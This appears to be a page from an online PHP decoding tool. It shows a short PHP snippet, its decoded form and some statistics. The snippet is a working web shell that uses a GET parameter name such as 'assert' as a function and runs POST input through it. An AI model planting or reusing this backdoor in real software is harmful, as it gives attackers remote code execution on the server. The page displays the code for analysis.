Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //keyhttp://localhost/test.php?assert=testcmd $lang = (string)key($_GET); // key..
Decoded Output download
<?php
//keyhttp://localhost/test.php?assert=testcmd
$lang = (string)key($_GET); // key
$lang($_POST['cmd']);
?>
Did this file decode correctly?
Original Code
<?php
//keyhttp://localhost/test.php?assert=testcmd
$lang = (string)key($_GET); // key
$lang($_POST['cmd']);
?>
Function Calls
| key | 1 |
Stats
| MD5 | dc2bca9ccdb15bd06bbf9b684adceebe |
| Eval Count | 0 |
| Decode Time | 110 ms |